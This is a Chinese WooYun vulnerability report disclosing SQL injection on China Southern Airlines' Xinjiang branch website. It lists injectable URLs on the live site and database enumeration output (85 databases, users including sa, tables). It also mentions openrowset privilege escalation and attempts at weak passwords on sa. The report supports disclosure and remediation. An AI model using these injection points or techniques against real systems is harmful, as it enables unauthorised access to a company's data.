当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0153621

漏洞标题:中国南方航空某分站存在SQL注入漏洞

相关厂商:中国南方航空股份有限公司

漏洞作者: 路人甲

提交时间:2015-11-11 18:02

修复时间:2015-12-26 19:14

公开时间:2015-12-26 19:14

漏洞类型:SQL注射漏洞

危害等级:低

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-11: 细节已通知厂商并且等待厂商处理中
2015-11-11: 厂商已经确认,细节仅向厂商公开
2015-11-21: 细节向核心白帽子及相关领域专家公开
2015-12-01: 细节向普通白帽子公开
2015-12-11: 细节向实习白帽子公开
2015-12-26: 细节向公众公开

简要描述:

rt.

详细说明:

漏洞存在于中国南方航空新疆分公司网站:http://www.xjair.com
注入点:http://www.xjair.com/articlelist.aspx?lmid=201111241132339582
http://www.xjair.com/article.aspx?id=201511021252236147
http://www.xjair.com/article.aspx?id=201510281636048110
http://www.xjair.com/article.aspx?id=201510221417206230
http://www.xjair.com/article.aspx?id=201510221416398861
http://www.xjair.com/article.aspx?id=201509101129137719
http://www.xjair.com/article.aspx?id=201509101125387361
...
共约62个点
取一个在神器里跑:http://www.xjair.com/article.aspx?id=201509101125387361
得到注入类型和配置参数:

1.png


暴库得到多达85的数据库:

available databases [85]:
[*] account
[*] agent
[*] agent_cargo
[*] Airbooking
[*] airkcb
[*] AMC
[*] aspnetdb
[*] cargo
[*] ccb_ticket
[*] CEM
[*] CEM_cargo
[*] CEM_NEW
[*] CISP
[*] CRM
[*] CWLog
[*] cwys
[*] DeptWeb_BGS
[*] DeptWeb_Bwb
[*] DeptWeb_CWB
[*] DeptWeb_DF
[*] DeptWeb_DF_KS
[*] DeptWeb_HR
[*] DeptWeb_HY
[*] DeptWeb_KCB
[*] DeptWeb_SC
[*] DeptWeb_SCB
[*] DeptWeb_SCB_KS
[*] DeptWeb_SYGS
[*] DeptWeb_VOTE
[*] DeptWeb_XXGCB
[*] DFBG
[*] download_data
[*] e_learning
[*] ECS
[*] FCS
[*] fii_csm
[*] FOC
[*] FSS
[*] fxb
[*] gh
[*] gnp_mis
[*] hwsweb
[*] indexData
[*] info
[*] ip_add
[*] iso9000
[*] jx_appraise
[*] kaoshi_v3
[*] kczb
[*] kseat
[*] kseatuser
[*] kyshj
[*] lzzc
[*] master
[*] medical
[*] mis_public
[*] model
[*] msdb
[*] Mticket
[*] MyFlightBudgetDB
[*] new_medical
[*] OMS
[*] plane
[*] RAS
[*] renliziyuan
[*] rlzy
[*] sms_gtp
[*] southair
[*] tang_webservice
[*] Telegraph
[*] tempdb
[*] vacation
[*] VIPIS
[*] vote
[*] webdata
[*] WorkBook
[*] WorkCertificate
[*] WorkDBCenter
[*] WorkManualFinancing
[*] WorkManualFinancingCloseOff
[*] xjhkgs
[*] XjVote
[*] XjWeb
[*] xtgl_web
[*] xxjsb


当前数据库和用户:

current database:    'XjWeb'
current user: 'xjweb'


数据库用户:

database management system users [2]:
[*] sa
[*] xjweb


由于权限的限制,只能在XjWeb这个库里面跑,共11张表:

foofoofoo
Dw_Lm
DW_Wz
DW_Fj
View_GetTk
View_GetWz
View_GetLmmc
View_GetTkHot
View_GetWzHot
D99_Tmp
Dw_LmLb


用手工试了下,sysobjects和syscolumns都被禁了,不能愉快的跨库了。

QQ截图20151111173407.png


最后试了下openrowset发现也有提权的可能:

QQ截图20151111173800.png


没精力爆破sa了,试了几个弱口令都不行。就到这儿吧。因为兴趣在其他的诸如account库上,所以也没深入XjWeb库。
虽然没什么收获,但好歹也是洞啊。

漏洞证明:

已证。

修复方案:

不会。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-11-11 19:12

厂商回复:

分公司自建的网站,需要加强整个公司的IT管理。多谢

最新状态:

暂无